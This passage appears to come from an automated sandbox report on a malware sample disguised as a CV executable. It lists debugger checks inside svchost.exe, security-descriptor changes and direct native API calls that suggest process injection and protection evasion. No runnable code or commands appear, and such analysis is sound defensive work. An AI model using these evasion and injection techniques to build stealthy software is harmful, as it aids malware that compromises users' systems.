                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]2_2_034649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]2_2_034FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]2_2_034BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A830 mov eax, dword ptr fs:[00000030h]2_2_0346A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]2_2_034D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]2_2_034D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E8C0 mov eax, dword ptr fs:[00000030h]2_2_0345E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA8E4 mov eax, dword ptr fs:[00000030h]2_2_034FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]2_2_0346C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]2_2_0346C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430887 mov eax, dword ptr fs:[00000030h]2_2_03430887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC89D mov eax, dword ptr fs:[00000030h]2_2_034BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]2_2_034B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]2_2_034B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]2_2_034B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]2_2_034B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4F42 mov eax, dword ptr fs:[00000030h]2_2_034D4F42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]2_2_0342CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]2_2_0342CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]2_2_0342CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]2_2_0342CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]2_2_0342CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]2_2_0342CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CF50 mov eax, dword ptr fs:[00000030h]2_2_0346CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D0F50 mov eax, dword ptr fs:[00000030h]2_2_034D0F50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345AF69 mov eax, dword ptr fs:[00000030h]2_2_0345AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345AF69 mov eax, dword ptr fs:[00000030h]2_2_0345AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2F60 mov eax, dword ptr fs:[00000030h]2_2_034D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2F60 mov eax, dword ptr fs:[00000030h]2_2_034D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504F68 mov eax, dword ptr fs:[00000030h]2_2_03504F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E6F00 mov eax, dword ptr fs:[00000030h]2_2_034E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432F12 mov eax, dword ptr fs:[00000030h]2_2_03432F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CF1F mov eax, dword ptr fs:[00000030h]2_2_0346CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EF28 mov eax, dword ptr fs:[00000030h]2_2_0345EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC8 mov eax, dword ptr fs:[00000030h]2_2_03432FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC8 mov eax, dword ptr fs:[00000030h]2_2_03432FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC8 mov eax, dword ptr fs:[00000030h]2_2_03432FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC8 mov eax, dword ptr fs:[00000030h]2_2_03432FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342EFD8 mov eax, dword ptr fs:[00000030h]2_2_0342EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342EFD8 mov eax, dword ptr fs:[00000030h]2_2_0342EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342EFD8 mov eax, dword ptr fs:[00000030h]2_2_0342EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE0 mov eax, dword ptr fs:[00000030h]2_2_0344CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE0 mov eax, dword ptr fs:[00000030h]2_2_0344CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470FF6 mov eax, dword ptr fs:[00000030h]2_2_03470FF6
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_000FA66C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E8189 SetUnhandledExceptionFilter,0_2_000E8189
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000E81AC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
